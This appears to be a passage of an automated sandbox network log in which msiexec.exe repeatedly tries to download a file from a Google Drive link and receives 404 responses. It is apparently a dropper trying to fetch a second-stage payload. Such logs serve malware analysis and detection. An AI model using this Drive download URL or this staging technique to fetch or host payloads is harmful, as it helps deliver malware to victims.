                                                          2025-01-11 00:31:18 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 48 48 50 63 77 77 4e 63 68 7a 46 76 52 71 50 4b 4e 78 4e 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aHHPcwwNchzFvRqPKNxNNA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.9 | 50004 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:19 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:20 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:19 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-IFBlSEacyJDcKC8yjacbnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.9 | 50005 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:20 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:21 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS0dH5gPxIKLQjaHCRjaCJV6_PrmqNR0-rqbItUL5OopRcL5tlvwRNTmfX5W4MI9VOl
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:21 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-0O89hh-CmwB9Q42LRc6Dmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:21 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 55 4d 59 67 74 41 6d 5f 56 35 63 71 49 44 4f 36 61 70 5f 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NUMYgtAm_V5cqIDO6ap_pA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.9 | 50006 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:22 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:22 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: script-src 'nonce-e-2oS7jVHB4QarwDvAXZSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.9 | 50007 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:23 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC5T3pxZ1cnATdwY8kai8GqW67n_7BOTtkv2U75vsoQ1Rzbc68dJbeYuJV9vm9pKShho
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:23 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-HWyt--RSRtmhR3Ze0MUUEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:23 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 54 66 49 52 78 47 71 41 37 50 5f 4c 5a 39 6b 2d 55 43 73 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gTfIRxGqA7P_LZ9k-UCsEA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.9 | 50008 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:24 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:24 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:24 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-HAsEh6yo4AMw1wuGAnCCyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.9 | 50009 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:25 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:25 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgRcI9kJLWCVj4zNnkPyO5ink68JUGSXs5qbPJacsva0zJKtLh9xmNEpl88XFj__sFJX
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:25 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: script-src 'nonce-YPfkk4IEd0PsBU5N-VAiwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:25 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 66 6a 35 6e 30 61 69 7a 5f 75 79 45 4b 76 48 6c 5a 74 2d 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rfj5n0aiz_uyEKvHlZt-cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          36 | 192.168.2.9 | 50010 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:26 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:27 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: script-src 'nonce-bLp1Do-XvMaWpSytI55Czw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          37 | 192.168.2.9 | 50011 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:28 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:28 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC7k3flitRR7HbbtluKTf9iGhgR5oOgoK5Tj00YCxAajma2GkjSyiCiuYDLogLkiriY3OcrNJ1M
